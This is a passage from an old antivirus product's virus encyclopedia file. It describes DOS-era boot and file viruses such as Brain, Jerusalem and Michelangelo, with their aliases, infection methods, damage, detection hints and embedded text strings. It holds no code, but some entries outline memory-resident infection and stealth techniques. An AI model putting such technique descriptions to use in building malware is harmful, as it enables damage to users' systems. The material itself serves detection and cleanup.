home *** CD-ROM | disk | FTP | other *** search
/ PC World Komputer 1998 September / PC_World-1998_09-CD2.iso / Pcillw95 / disk2 / DATA.2 / COMMON.VIR < prev    next >
Encoding:
Text File  |  1996-11-05  |  485.3 KB  |  15,136 lines
  1. [(c)Brain]
  2. Virus Name: (c)Brain
  3. Alias Name: Pakistani, Clone, Nipper
  4. Virus Type: Boot Virus
  5. Virus Length: N/A
  6. Description: This virus infectes boot sectors.
  7.  
  8. When an infected file is executed, the virus
  9. installs itself into memory. Total available
  10. memory will have decreased by 3-7 Kbytes.
  11.  
  12. This virus moves the boot sector and replaces it
  13. with a copy of the virus. The original boot sector
  14. will be moved to another sector and marked as bad.
  15. This virus will also change the disk label to read
  16.  
  17.     "(c) Brain".
  18.  
  19. The following text is located in the virus:
  20.  
  21.     Welcome to the Dungeon
  22.     (c) 1986 Basit & Amjad (pvt) Ltd.
  23.     BRAIN COMPUTER SERVICES
  24.     730 NIZAB BLOCK ALLAMA IQBAL TOWN
  25.     LAHORE-PAKISTAN
  26.     PHONE :430791,443248,280530.
  27.     Beware of this VIRUS....
  28.     Contact us for vaccination.................
  29.     $#@%$@!!
  30.  
  31. [555]
  32. Virus Name: 555
  33. Alias Name: Dutch 555, Quit-199
  34. Virus Type: File Virus
  35. VirusLength: 555 bytes
  36. Description: This virus infects *.COM and *.EXE
  37.              files, as well as COMMAND.COM.
  38.  
  39. When an infected file is executed, the virus
  40. installs itself into memory. Total available
  41. memory will have decreased by 560 bytes.
  42.  
  43. Once the virus is memory resident, it will infect
  44. *.COM and *.EXE files as they are executed.
  45. Infected files will increase in size by 555 bytes,
  46. with the virus being located at the end of the
  47. infected file. Infected files will have their date
  48. and time records updated to the date and time the
  49. infection occurred.
  50.  
  51. [AirCop]
  52. Virus Name: AirCop
  53. Alias Name:
  54. Virus Type: Boot Virus
  55. Virus Length: N/A
  56. Description: This virus infects boot sectors.
  57.  
  58. When a system is booted from a disk infected by
  59. the virus,  the virus will install itself memory
  60. resident.  Total system memory will decrease by
  61. 1,024 bytes.
  62.  
  63. Once the virus is memory resident, all unprotected
  64. diskettes accessed will be infected.  The virus
  65. will replace the floppy boot sector with a copy of
  66. itself.
  67.  
  68. The virus will show the following message on
  69. infected systems:
  70.  
  71.      "Red State, Germ Offensive.
  72.       AIRCOP."
  73.  
  74. [Alameda]
  75. Virus Name: Alameda
  76. Alias Name: Alemeda
  77. Virus Type: Boot Virus
  78. Virus Length: N/A
  79. Description: This virus infects boot sectors.
  80.  
  81. When the system is booted from a disk infected by
  82. the virus, the virus will install itself memory
  83. resident.
  84.  
  85. Once the virus is memory resident, all unprotected
  86. 5-1/4" 360k diskettes will be infected when it
  87. activates through a warm boot (CTRL-ALT-DEL). (The
  88. virus suntil remains in memory after a warm boot).
  89.  
  90. [Ambulance]
  91. Virus Name: Ambulance
  92. Alias Name: Ambulance Car, RedX
  93. Virus Type: File Virus
  94. VirusLength: 796 bytes
  95. Description: This virus infects *.COM files.
  96.  
  97. When an infected file is executed, the virus will
  98. attempt to infect one *.COM file.
  99.  
  100. Other symptoms include displaying a moving
  101. ambulance at the bottom of the screen as well as
  102. playing the sound of a siren.
  103.  
  104. [AntiEXE]
  105. Virus Name: AntiEXE
  106. Alias Name: D3, NewBug, CMOS4
  107. Virus Type: Boot Virus
  108. Virus Length: N/A
  109. Description: This virus infects boot sectors.
  110.  
  111. When the system is booted from a disk infected by
  112. the virus,  the virus will install itself memory
  113. resident.  Total available memory will have
  114. decreased by 1,024 bytes.  The virus will also
  115. overwrite the Master Boot Sector with a copy of
  116. the virus.
  117.  
  118. Once the virus is memory resident, it will
  119. infect all unprotected diskettes.
  120.  
  121. [Atomic]
  122. Virus Name: Atomic
  123. Alias Name:
  124. Virus Type: File Virus
  125. VirusLength: 371 bytes
  126. Description: This virus infects *.COM files.
  127.  
  128. When an infected file is executed, the virus will
  129. infect the first two *.COM files located in the
  130. same directory.  The virus will permanently
  131. overwrite the first 371 bytes of the files it
  132. infects.  Date and time fields of infected files
  133. will not be altered. The virus will show the
  134. following message after infecting a file:
  135.  
  136.     "Bad command or file name"
  137.  
  138. The following text string is located in the virus:
  139.  
  140.     "[TAD1A] Memory Lapse -- Toronto, CANADA"
  141.     "The Atomic Dustbin 1A -- This is just the first
  142.     step"
  143.     "Bad command or file name"
  144.     "*.COM .. c Dustbin 1A -- This is just the first
  145.     step"
  146.  
  147. [Austr_Parasite]
  148. Virus Name: Austr_Parasite
  149. Alias Name: Aussie Parasite
  150. Virus Type: File Virus
  151. Virus Length: 292 bytes
  152. Description: This virus infects *.COM files as
  153.              well as COMMAND.COM.
  154.  
  155. When an infected file is executed, the virus will
  156. install itself into memory. Total available memory
  157. will have decreased by 320 bytes.
  158.  
  159. Once the virus is memory resident, all executing
  160. *.COM files will be infected. Infected files will
  161. increase in size by 292 bytes, with the virus
  162. being located at the end of the infected file.
  163. Date and time records of infected files will not
  164. be altered.
  165.  
  166. Symptoms include system hang.
  167.  
  168. The following text string is visible in the virus:
  169.  
  170.     "Australian Parasite"
  171.  
  172. [Bljec]
  173. Virus Name: Bljec
  174. Alias Name: Black Jec
  175. Virus Type: File Virus
  176. Virus Length: 231-440 bytes
  177. Description: This virus infects *.COM files.
  178.  
  179. When an infected file is executed, the virus will
  180. infect 3 *.COM programs in the same directory.
  181. Infected files will increase in size by 231-440
  182. bytes, with the virus being located at the
  183. beginning of the infected file. Infected files
  184. will have their date and time records updated to
  185. the date and time the infection occurred.
  186.  
  187. Symptoms include system hang.
  188.  
  189. [Butterfly]
  190. Virus Name: Butterfly
  191. Alias Name: Butterflies
  192. Virus Type: File Virus
  193. Virus Length: 302 bytes
  194. Description: This virus infectes *.COM files.
  195.  
  196. When an infected file is executed, the virus will
  197. infect all the *.COM files located in the same
  198. directory.
  199.  
  200. Infected files will increase in size by 302 bytes,
  201. with the virus being located at the end of the
  202. infected file.  Infected files will not have their
  203. date and time records altered.
  204.  
  205. The following text string is located in the virus:
  206.  
  207.     "Goddamn Butterflies"
  208.     "*.COM"
  209.  
  210. [Cascade]
  211. Virus Name: Cascade
  212. Alias Name: Black Jack, Falling
  213. Virus Type: File Virus
  214. Virus Length: 1,701 or 1,704 bytes
  215. Description: This virus infectes *.COM files.
  216.  
  217. When an infected file is executed, the virus
  218. installs itself into memory.
  219.  
  220. Once the virus is memory resident, it will cause
  221. the characters on the screen to fall to the bottom
  222. of the screen.
  223.  
  224. [Connie]
  225. Virus Name: Connie
  226. Alias Name:
  227. Virus Type: File Virus
  228. Virus Length: 1,761 bytes
  229. Description: This virus infectes *.COM  files, as
  230.              well as COMMAND.COM.
  231.  
  232. When an infected file is executed, the virus
  233. installs itself into memory. Total available
  234. memory will have decreased by 3,520 bytes.
  235.  
  236. Once the virus is memory resident, it will infect
  237. *.COM files when they are executed, opened, or copied.
  238. Infected files will increase in size by 1,761
  239. bytes, with the virus being located at the end of
  240. the infected file. The date and time information of
  241. infected files will not be altered.
  242.  
  243. The following text string can be found in the
  244. virus:
  245.  
  246.     "This is <Connie> Written by Dark Slayer in
  247.     Keelung TAIWAN P:\COMMAND.COM"
  248.  
  249. [CVirus]
  250. Virus Name: CVirus
  251. Alias Name: Nowhere Man, VMessi
  252. Virus Type: File Virus
  253. Virus Length:
  254. Description: This virus infectes *.COM  and *.EXE
  255.              files which are larger than 6,300
  256.              bytes in size.
  257.  
  258. When an infected file is executed, the virus will
  259. search for a suitable file to infect (larger than
  260. 6,300 bytes in size). Infected files will have the
  261. original first 6,286 bytes overwritten by the
  262. virus. Date and time information of infected files
  263. will not be altered.  Once a file has been
  264. successfully infected, the following message will
  265. be displayed on the screen:
  266.  
  267.     "Out of memory"
  268.  
  269. If infection was not possible, the following
  270. message will be displayed:
  271.  
  272.     "All files infected.  Mission complete."
  273.  
  274. The following text string can be found in the
  275. virus:
  276.  
  277.     "NMAN"
  278.     "BMAN"
  279.     "*.EXE"
  280.  
  281.  
  282. [DataLock]
  283. Virus Name: DataLock
  284. Alias Name: Datalock.920.A, V920
  285. Virus Type: File Virus
  286. Virus Length: 920 bytes
  287. Description: This virus infects *.COM and *.EXE
  288.              files
  289.  
  290. Interrupt vectors hooked: INT 21h.
  291.  
  292. Infection method: When an infected file runs, the
  293. virus loads itself in memory. While loaded, it
  294. infects any file that executes. Infected files
  295. increase by 920 bytes.
  296.  
  297. Damage: After August 1990, the virus won't allow
  298. files with the extension .?BF to be opened. When
  299. an attempt is made, it displays the erroneous
  300. error message "Too many files open."
  301.  
  302. [Denzuko]
  303. Virus Name: Denzuko
  304. Alias Name: Den Zuk
  305. Virus Type: Boot Virus
  306. Virus Length: N/A
  307. Description: This virus infects boot sectors
  308.  
  309. Infection method: When the system attempts to boot
  310. from an infected diskette, the virus loads itself
  311. into memory--even if the boot fails. While loaded,
  312. the virus attempts to infect any accessed
  313. diskette.
  314.  
  315. Damage: When <Ctrl><Alt><Del> is pressed, the
  316. message "Den Zuk" is displayed and the system seems
  317. to reboot. However, the virus remains in memory.
  318. Because the virus was designed for 360 KB
  319. diskettes, it unintentionally destroys data on 3.5
  320. inch or 1.2 MB diskettes.
  321.  
  322. [Die_Hard_2]
  323. Virus Name: Die_Hard_2
  324. Alias Name: DH2
  325. Virus Type: File Virus
  326. Virus Length: 4,000 bytes
  327. Description: This virus infects *.COM and *.EXE
  328.              files
  329.  
  330. Interrupt vectors hooked: INT 21h.
  331.  
  332. Infection method: When an infected file runs, the
  333. virus loads itself in memory. While loaded, it
  334. infects accessed, executable files. Infected files
  335. increase by 4,000 bytes.
  336.  
  337. Damage: Under analysis.
  338.  
  339. [Dir]
  340. Virus Name: Dir
  341. Alias Name: DIR
  342. Virus Type: File Virus
  343. Virus Length: 691 bytes
  344. Description: See Dir-2
  345.  
  346. [Dir-2]
  347. Virus Name: Dir-2
  348. Alias Name: Dir-II, Creeping Death
  349. Virus Type: File Virus
  350. Virus Length: 1,024 bytes
  351. Description: This virus infects *.COM and *.EXE
  352.              files
  353.  
  354. PC Vectors Hooked: None
  355.  
  356. Executing Procedure:
  357. 1) When the virus loads itself resident in memory
  358.    it will change the directory structure data so
  359.    that certain executable files are linked to
  360.    itself.
  361. 2) This makes it so that when you execute a file
  362.    that the DIR2-910 virus has linked to, it also
  363.    is executed.  At this point it can begin to
  364.    infect other files.
  365. 3) The virus stays resident in memory but doesn't
  366.    hook any interrupts. It uses another function
  367.    to infect files . It infects .COM &.EXE files
  368.    when they are "READ & WRITE".
  369.  
  370. Damage: When all the .COM & .EXE files been
  371. infected on a disk, it will not be possible
  372. to execute any files from the disk.
  373.  
  374. Detecting Method: Check the disk by using
  375. "CHKDSK.EXE", if some files are cross-linked
  376. to the same position, then these files must be
  377. infected.
  378.  
  379. Note: DIR2-910 doesn't hook INT 24h when infecting
  380. files. It omits I/O errors (such as write
  381. protect).
  382.  
  383. [Disk_Killer]
  384. Virus Name: Disk_Killer
  385. Alias Name: Ogre
  386. Virus Type: Boot Virus
  387. Virus Length: N/A
  388. Description: This virus infects boot sectors
  389.  
  390. Infection method: When the system is booted from
  391. an infected disk, the virus loads itself in
  392. memory.
  393.  
  394. Damage: After the computer has been on for 48
  395. hours, the virus displays the message below and
  396. then encrypts all the data on the hard disk:
  397.  
  398. "Disk Killer -- Version 1.00 by COMPUTER OGRE
  399.  04/01/1989
  400.  
  401.  Warning!!
  402.  Don't turn off the power or
  403.  remove the diskette while Disk Killer is Processing.
  404.  Processing.
  405.  Now you can turn off the power. I wish you luck."
  406.  
  407. [EDV]
  408. Virus Name: EDV
  409. Alias Name: Cursy
  410. Virus Type: Boot Virus
  411. Virus Length: N/A
  412. Description: This virus infectes boot sectors.
  413.  
  414. When the system is booted from a disk infected by
  415. the virus, the virus will install itself into
  416. memory.
  417.  
  418. Once the virus is memory resident, it will infect
  419. floppy disks on access. It will move the original
  420. boot sector, replacing it with a copy of the virus.
  421.  
  422. Once the virus has infected six disks, it will
  423. disable the keyboard as well as corrupt all disks
  424. in the system.  Once completed, the following
  425. message will be displayed on the screen:
  426.  
  427.     "That rings a bell, no?  From Cursy"
  428.  
  429. The following string can be found in infected boot
  430. sectors:
  431.  
  432.     "MSDOS Vers. E.D.V."
  433.  
  434. [Exebug]
  435. Virus Name: Exebug
  436. Alias Name: Swiss Boot, CMOS killer
  437. Virus Type: Boot Virus
  438. Virus Length: N/A
  439. Description: This virus infects boot sectors
  440.  
  441. Interrupt vectors hooked: INT 13h.
  442.  
  443. Infection method: When the system is booted from
  444. an Exebug infected diskette, the Exebug virus will
  445. install itself memory resident at the top of
  446. system memory but below the 640K DOS boundary,
  447. moving interrupt 12's return.  Total system and
  448. available free memory will have decreased by 1,024
  449. bytes.  Also at this time, the virus will infect
  450. the system hard disk's master boot sector.
  451.  
  452. Damage: Master boot sector corruption; decrease in
  453. total system & available free memory; inability to
  454. access drive C: after diskette boot
  455.  
  456. [Fat_Table]
  457. Virus Name: Fat_Table
  458. Alias Name:
  459. Virus Type: File Virus
  460. Virus Length: 6,540 bytes
  461. Description: This virus infectes *.EXE  files.
  462.  
  463. When an infected file is executed, the virus will
  464. infect one *.EXE file located in the same
  465. directory.  The virus will overwrite the first
  466. 6,540 bytes of the original file. Date and time
  467. information of infected files will be updated to
  468. the time of infection.
  469.  
  470. The following text string can be found in the
  471. virus:
  472.  
  473.     "hitohana"
  474.     "karu ba"
  475.     "rb C:\ * .* FAT TABLE E"
  476.     "8RROR"
  477.     "EXE"
  478.     "COM"
  479.  
  480. [Filler.A]
  481. Virus Name: Filler.A
  482. Alias Name: Filler
  483. Virus Type:   Boot Virus
  484. Virus Length: N/A
  485. Description: This virus infects boot sectors
  486.  
  487. Infection method: When the system is booted from
  488. an infected floppy, the virus loads itself in
  489. memory. While loaded, it infects any accessed,
  490. non-protected disks. The DOS CHKDSK program will
  491. show a "total bytes memory" decrease of 8,192
  492. bytes.
  493.  
  494. Damage: Under analysis.
  495.  
  496. [Flip]
  497. Virus Name: Flip
  498. Alias Name:
  499. Virus Type:   Boot Virus
  500. Virus Length: 2,672 bytes
  501. Description: This virus infects *.COM and *.EXE
  502.              files
  503.  
  504. Interrupt Vectors Hooked: INT 21h
  505.  
  506. Infection Process:
  507. This virus can be spread by executing an infected
  508. program or from booting the system with an
  509. infected disk. There are several methods of
  510. infection.
  511.  
  512. 1) Infection of a clean system by an infected
  513. program.
  514.  
  515. When an infected program is executed in a clean
  516. system, the virus will copy itself in the last
  517. side of the last cylinder, beginning from the 5th
  518. last sector to the 1st last sector and the virus
  519. will subtract the DOS boot sector at offset 0x13h
  520. (Number of logical sectors )with 6. Finally, virus
  521. writes the virus body to partition sector.
  522.  
  523. 2) Spreading the infection through a disk that has
  524. been infected.
  525.  
  526. If a PC is booted from an infected disk, the
  527. spreading of the infection is complete.  The boot
  528. code, previously overwritten by the virus on the
  529. disk partition sector, reads the main core of the
  530. virus from the last 5 sectors to the last 1
  531. sector, and loads it as a TSR in RAM, occupying 3
  532. Kb of the higher part of system memory.  As soon
  533. as it is installed as a TSR, the virus takes
  534. control of Int 1Ch (Timer Interrupt) to verify,
  535. with a frequency of 18.2 times per second, if the
  536. DOS COMMAND.COM is loaded.  If DOS is present, the
  537. virus restores the timer and takes control of Int
  538. 21h.
  539.  
  540. Damage: Loss of data stored in the 6th last to 1st
  541. last sectors of the disk. Virus also increases
  542. file sizes.
  543.  
  544. Symptoms: Virus turns screen display upside down
  545. (rotates 180 degrees). File sizes increase by
  546. 2,153 bytes
  547.  
  548. Note: The virus uses a smart technique to avoid
  549. anti-virus detection programs, when modifying the
  550. partition sector, that is hooking int 01h, it will
  551. turn on a single step flag to get the original
  552. entry of DOS hooked of INT 13h . The virus will
  553. then move itself to the top of the MCB (memory
  554. control block), and decrease available memory in
  555. the MCB by 2672 (A70h) bytes. It will hook Int 21h
  556. with the same method as for INT 13h and then
  557. proceeds to run the original program.
  558.  
  559. [Form.A]
  560. Virus Name: Form.A
  561. Alias Name: FORM, Form, Form 18, Generic
  562. Virus Type: Boot Virus
  563. Virus Length: N/A
  564. Description: This virus infects boot sectors
  565.  
  566. Interrupt vectors hooked: INT 13h, INT 09h.
  567.  
  568. Infection method: When the system is booted from
  569. an infected diskette, the virus infects the DOS
  570. boot sector and loads itself in memory. While
  571. loaded, it infects any accessed, non-protected
  572. disks. The DOS CHKDSK program will indicate
  573. 653,312 bytes of free memory.
  574.  
  575. Damage: On the 18th day of any month, the virus
  576. will emit a clicking sound whenever keys are
  577. pressed. The system may hang when a read error
  578. occurs, and parts of the original boot sector may
  579. be overwritten, making the partition unbootable.
  580.  
  581. [Friday_13th]
  582. Virus Name: Friday_13th
  583. Alias Name: Friday the 13th, Virus 1813,
  584.             Israelian, Jerusalem
  585. Virus Type: File Virus
  586. Virus Length: approx. 1,813 bytes
  587. Description: This virus infects *.COM and *.EXE
  588.              files
  589.  
  590. PC Vectors Hooked:  Int 21
  591.  
  592. Executing Procedure:
  593. 1) The virus checks whether it is already loaded
  594.    resident in memory. If "No", it then loads
  595.    itself into resident memory by hooking INT 21h.
  596. 2) It then executes the original file.
  597. 3) With itself loaded into resident memory it will
  598.    infect any uninfected file that is executed.
  599.  
  600. Damage: In the year 1987, the virus does no damage
  601. . It proceeds only to infect other files. Every
  602. Friday the 13th, excluding the year 1987, virus
  603. deletes every executed program . All other days,
  604. excluding the year 1987, the virus spreads.  About
  605. half an hour after the virus is installed in
  606. memory it scrolls up by two lines a small window
  607. with coordinates (5, 5), (16, 16) and slows down
  608. computer speed.  Delay loop repeats 18.5 times per
  609. second.
  610.  
  611. Detecting Method: Increases the file length by
  612. 1813 bytes
  613.  
  614. Note: Loads itself resident in memory.  An error
  615. message occurs if there is an I/O error (such as
  616. write protect).
  617.  
  618. [Frodo.Frodo.A]
  619. Virus Name: Frodo.Frodo.A
  620. Alias Name: 4096, IDF, 4096-1, Frodo,
  621.             Frodo.Frodo.A, 100 Year
  622. Virus Type: File Virus
  623. Virus Length: 4,096 bytes
  624. Description: This virus infects *.COM and *.EXE
  625.              files
  626.  
  627. Interrupt vectors hooked: INT 21h, INT 13h.
  628.  
  629. Infection method: When an infected file runs, the
  630. virus loads itself in memory. While loaded, it
  631. infects accessed, executable files. The virus
  632. increases the size of infected files by 4096
  633. bytes.
  634.  
  635. Damage: After September 21, the virus tries to
  636. modify the boot sector to display "FRODO LIVES."
  637. However, the virus code is corrupted, so instead
  638. of modifying the system areas, it crashes the
  639. system.
  640.  
  641. Note: While the virus is in memory, it hides the
  642. increase in infected file sizes.
  643.  
  644. [Generic_408]
  645. Virus Name: Generic_408
  646. Alias Name: NYB, B1
  647. Virus Type: Boot Virus
  648. Virus Length: N/A
  649. Description: This virus infects boot sectors
  650.  
  651. Infection method: When the system is booted from
  652. an infected diskette, the virus infects the master
  653. boot record and loads itself in memory. While
  654. loaded, it infects any accessed, non-protected
  655. disks.
  656.  
  657. Damage: None known.
  658.  
  659. [Generic_437]
  660. Virus Name: Generic_437
  661. Alias Name: Boot-437
  662. Virus Type: Boot Virus
  663. Virus Length: N/A
  664. Description: This virus infects boot sectors
  665.  
  666. This virus will only infect hard drives when an
  667. attempt to boot from an infected diskette is made.
  668. Once the virus has infected the hard drive, all
  669. non-protected floppies used in the machine will be
  670. infected.
  671.  
  672. Unlike most other boot sector viruses (except
  673. Form), Boot-437 infects the DOS boot sector on
  674. hard drives instead of the Master Boot Record.
  675.  
  676. [GreenCat]
  677. Virus Name: GreenCat
  678. Alias Name: Green Caterpillar,
  679.             Green_Caterpillar.1575.A, Find, 1591,
  680.             1575
  681. Virus Type: File Virus
  682. Virus Length: 1,991 to 2,005 bytes
  683. Description: This virus infects *.COM and *.EXE
  684.              files
  685.  
  686. Interrupt vectors hooked: INT 21h.
  687.  
  688. Infection method: When an infected file runs, the
  689. virus loads itself in memory.
  690.  
  691. Damage: After a specified time period has elapsed,
  692. the execution of an infected file causes a green
  693. caterpillar to run across the screen, excreting
  694. the screen contents as it goes. There is no
  695. permanent damage.
  696.  
  697. [Grog31]
  698. Virus Name: Grog31
  699. Alias Name: Grog 3.1
  700. Virus Type: File Virus
  701. Virus Length: 1,200 bytes
  702. Description: This virus infects *.COM files as
  703.              well as COMMAND.COM.
  704.  
  705. When an infected file is executed, the virus
  706. installs itself into memory. Total available
  707. memory will have decreased by 4,800 bytes.  The
  708. virus will also infect COMMAND.COM.
  709.  
  710. Once the virus is memory resident, it will infect
  711. *.COM files that are larger than 2,000 bytes when
  712. they are executed or opened.  Infected files will
  713. increase in size by 1,200 bytes, with the virus
  714. being located at the beginning of the infected
  715. file. Date and time information of infected files
  716. will not be altered.
  717.  
  718. The following text string can be found in the
  719. virus:
  720.  
  721.     "GROG 4EVER!"
  722.     "GROG v3.1 (C) '93 by GROG - Italy"
  723.     "Microsoft C:\COMMAND.COM"
  724.  
  725. [Hacktic2]
  726. Virus Name: Hacktic2
  727. Alias Name:
  728. Virus Type: File Virus
  729. Virus Length: 83 bytes
  730. Description: This virus infects *.COM and *.EXE
  731.              files, including COMMAND.COM.
  732.  
  733. When an infected file is executed, the virus will
  734. infect one file in the current directory,
  735. truncating the file size to 83 bytes as well as
  736. changing the file to hidden attribute.  The date
  737. and time information of infected files will be
  738. updated to the time of infection.
  739.  
  740. [Hobbit]
  741. Virus Name: Hobbit
  742. Alias Name:
  743. Virus Type: File Virus
  744. Virus Length: 505 bytes
  745. Description: This virus infects *.EXE files.
  746.  
  747. When an infected file is executed, the virus
  748. installs itself into memory. Total available
  749. memory will have decreased by 1,440 bytes.
  750.  
  751. Once the virus is memory resident, it will infect
  752. *.EXE when they are executed or opened.  The virus
  753. will overwrite the first 505 bytes of the file.
  754. Date and time information of infected files will
  755. not be altered.
  756.  
  757. The following text string can be found in the
  758. virus:
  759.  
  760.     "HOBIT"
  761.  
  762. [Jerusalem]
  763. Virus Name: Jerusalem
  764. Alias Name: Israeli, Jerusalem.1808.Standard,
  765.             1808, Israeli, 1813 Jeru-3-3,
  766.             Jerusalem.1808.Critical.
  767. Virus Type: File VIrus
  768. Virus Length: 1,808 to 1,822 bytes
  769. Description: This virus infects *.COM and *.EXE
  770.              files
  771.  
  772. Interrupt vectors hooked: INT 21h, INT 08h.
  773.  
  774. Infection method: When an infected file runs, the
  775. virus loads itself in memory. While loaded, it
  776. infects any file that executes, except the
  777. COMMAND.COM file. The virus increases the size of
  778. .EXE files by 1,808-1,822 on the first infection
  779. and 1,808 bytes with each reinfection. Infected
  780. .COM files increase by 1813 bytes.
  781.  
  782. Damage: On Friday the 13th, after the virus has
  783. been resident 30 minutes, it deletes files that
  784. are executed. On other days, the virus slows down
  785. the system 30 minutes after each infection. It
  786. also wipes out an area of the screen, though
  787. nothing is displayed. A bug in the virus can cause
  788. .EXE file to be infected repeatedly until they
  789. become too large to execute.
  790.  
  791. [Joshi]
  792. Virus Name: Joshi
  793. Alias Name: Happy Birthday Joshi
  794. Virus Type: Boot Virus
  795. Virus Length: N/A
  796. Description: This virus infects boot sectors
  797.  
  798. Detecting Method: The first "Joshi" virus was
  799. founded in India in June 1990. It is a very
  800. popular virus in India.  Virus remains resident in
  801. boot sector or in FAT area. Every January 5, the
  802. virus displays: Type Happy Birthday Joshi."  All
  803. will return to normal if user types above message.
  804. System memory decreases by 6KB when virus is
  805. resident.
  806.  
  807. Note: Loads itself resident in memory. An error
  808. message occurs if there is an I/O error (such as
  809. write protect).
  810.  
  811. [Jumper]
  812. Virus Name: Jumper
  813. Alias Name: 2kb
  814. Virus Type:   File Virus
  815. Virus Length: 2,048 bytes
  816. Description: This virus infects *.COM and *.EXE
  817.              files and COMMAND.COM
  818.  
  819. When an infected file is first executed in a clean
  820. system, the virus will load itself into memory.
  821. Total memory will have decreased by 8,336 bytes.
  822. Once the virus is memory resident, it will infect
  823. *.COM and *.EXE files as they are being executed.
  824. Infected files will have a file length increase of
  825. 2,048 bytes. The date and time information of
  826. infected files will not be altered.
  827.  
  828. The following text string is located in infected
  829. programs:
  830.  
  831.      "BIOS"
  832.  
  833. [Junkie.A-1]
  834. Virus Name: Junkie.A-1
  835. Alias Name: Junkie
  836. Virus Type: File Virus
  837. Virus Length: N/A
  838. Description: This virus infects *.COM and *.EXE
  839.              files
  840.  
  841. Interrupt vectors hooked: INT 1Ch, INT 21h.
  842.  
  843. Infection method: The first time an infected file
  844. runs, the virus overwrites hard disk's master boot
  845. record. When the system is booted again (or when
  846. it is booted from an infected diskette), the virus
  847. loads itself in memory. While loaded, the virus
  848. infects any .COM file that executes and any
  849. accessed diskettes. The DOS CHKDSK program will
  850. show a "total bytes memory" decrease of 3,072
  851. bytes. Infected files increase by just over 1,000
  852. bytes.
  853.  
  854. Damage: None known.
  855.  
  856. [K_Hate]
  857. Virus Name: K_Hate
  858. Alias Name: K-Hate
  859. Virus Type: File Virus
  860. Virus Length: 1,237 to 1,304 bytes
  861. Description: This virus infects *.COM files
  862.              including COMMAND.COM.
  863.  
  864. When an infected file is executed, the virus will
  865. infect all *.COM files in the same directory.
  866. Infected files will experience a file length
  867. increase of 1,237 to 1,304 bytes with the virus
  868. being located at the end of the file.  Date and
  869. time information of infected files will not be
  870. altered.
  871.  
  872. The following text string can be found in the
  873. virus:
  874.  
  875.     "CRYPT INFO"
  876.     "KDG 0,5 / Khntark3"
  877.     "*, K-HATE / Khntark*.COM"
  878.  
  879. [Kampana.A]
  880. Virus Name: Kampana.A
  881. Alias Name: Telecom Boot, Campa, Anti-Tel, Brasil
  882. Virus Type: Boot Virus
  883. Virus Length: N/A
  884. Description: This virus infects boot sectors
  885.  
  886. Interrupt vectors hooked: INT 13h.
  887.  
  888. Infection method: When the system is booted from
  889. an infected diskette, the virus loads itself in
  890. memory. While loaded, it infects any accessed
  891. disks. The DOS CHKDSK program will show a "total
  892. bytes memory" decrease of 1,024 bytes.
  893.  
  894. Damage: After a number of reboots, the virus
  895. overwrites sectors of the hard disk.
  896.  
  897. Note: If you attempt to examine the master boot
  898. record while the virus is loaded, it will display
  899. the original, uninfected version.
  900.  
  901. [KeyKapture]
  902. Virus Name: KeyKapture
  903. Alias Name: KeyKap, Hellspawn.1
  904. Virus Type: File Virus
  905. Virus Length: 1,074 bytes
  906. Description: This virus infects *.EXE files by
  907.              creating a hidden *.COM file of the
  908.              same name in the same directory.
  909.  
  910. When an infected file is executed, the virus
  911. installs itself into memory. Total available
  912. memory will have decreased by 3,072 bytes.
  913.  
  914. Once the virus is memory resident, it will infect
  915. *.EXE when they are executed by creating a 1,074
  916. byte *.COM file of the same name.  The original
  917. *.EXE file will not be changed in any way.
  918. Infected systems may experience system hangs
  919.  
  920. The following text string can be found in the
  921. virus:
  922.  
  923.     "KKV.90 KeyKapture Virus v0.90 [Hellspawn-II]
  924.      (c) 1994 by Stormbringer [PS]"
  925.  
  926. [MacGyver]
  927. Virus Name: MacGyver
  928. Alias Name:
  929. Virus Type: File Virus
  930. Virus Length: 2,824 bytes
  931. Description: This virus infects *.EXE files
  932.  
  933. Infection method:  When the infected program is
  934. executed, the MacGyver virus will install itself
  935. memory resident as a low system memory TSR of
  936. 3,072 bytes. When the MacGyver virus is memory
  937. resident, it will infect .EXE programs when they
  938. are executed or opened.  The following text string
  939. is visible within the MacGyver viral code in all
  940. infected programs:
  941.  
  942.     "SCANVIR.SHW"
  943.  
  944. Damage:  It may cause frequent system hangs when
  945. .EXE programs are executed. Besides, the DOS
  946. CHKDSK program will indicate file allocation
  947. errors on all infected files when the virus is
  948. memory resident.
  949.  
  950. [Metal_Militia]
  951. Virus Name: Metal_Militia
  952. Alias Name: MMIR, Immortal Riot
  953. Virus Type: File Virus
  954. Virus Length: 282 bytes
  955. Description: This virus infects *.COM  files, as
  956.              well as COMMAND.COM.
  957.  
  958. When an infected file is executed, the virus
  959. installs itself into memory. Total available
  960. memory will have decreased by 3,072 bytes.
  961.  
  962. Once the virus is memory resident, it will infect
  963. *.COM when they are executed.  Infected files will
  964. increase in size by 1,054-5 bytes, with the virus
  965. being located at the beginning of the infected
  966. file. Date and time information of infected files
  967. will not be altered.
  968.  
  969. The following text string can be found in the
  970. virus:
  971.  
  972.   "Senseless Destruction..."
  973.   "Protecting what we are joining together to take
  974.    on the world.."
  975.   "METAL MiLiTiA [iMMORTAL RIOT] SVW"
  976.  
  977. [Michelangelo]
  978. Virus Name: Michelangelo
  979. Alias Name:
  980. Virus Type: Boot Virus
  981. Virus Length: N/A
  982. Description: This virus infects disk boot sectors.
  983.  
  984. When the system is booted from a disk infected
  985. with the Michelangelo virus, the virus will
  986. install itself into memory. Total available memory
  987. will have decreased by 2,048 bytes.
  988.  
  989. Once the virus is memory resident, it will infect
  990. diskette boot sectors on access.  The virus will
  991. move the original boot sector and replace it with
  992. a copy of the virus.
  993.  
  994. This virus activates on March 6.  It will format
  995. the hard disk, overwriting all existing data.
  996.  
  997. [Monkey]
  998. Virus Name: Monkey
  999. Alias Name: Stoned.Empire.Monkey.B, Monkey 2
  1000. Virus Type: Boot Virus
  1001. Virus Length: N/A
  1002. Description: This virus infects boot sectors
  1003.  
  1004. Infection method: When the system is booted with
  1005. an infected diskette, the virus loads itself in
  1006. memory. While loaded, it infects any accessed,
  1007. non-protected disks. The DOS CHKDSK program will
  1008. show a "total bytes memory" decrease of 1,024
  1009. bytes. Monkey-1 is one of the few viruses that can
  1010. successfully infect floppies while Microsoft
  1011. Windows is running.
  1012.  
  1013. Damage: The virus encrypts the partition table of
  1014. the master boot record. If you attempt to boot
  1015. from a clean floppy, the disk will be inaccessible
  1016. because the partition table has been moved.
  1017.  
  1018. Note: If you attempt to examine the master boot
  1019. record while the virus is in memory, it will
  1020. display the original, uninfected version.
  1021.  
  1022. Caution: Do not use FDISK /MBR to clean this
  1023. virus.
  1024.  
  1025. [MSWord_Concept]
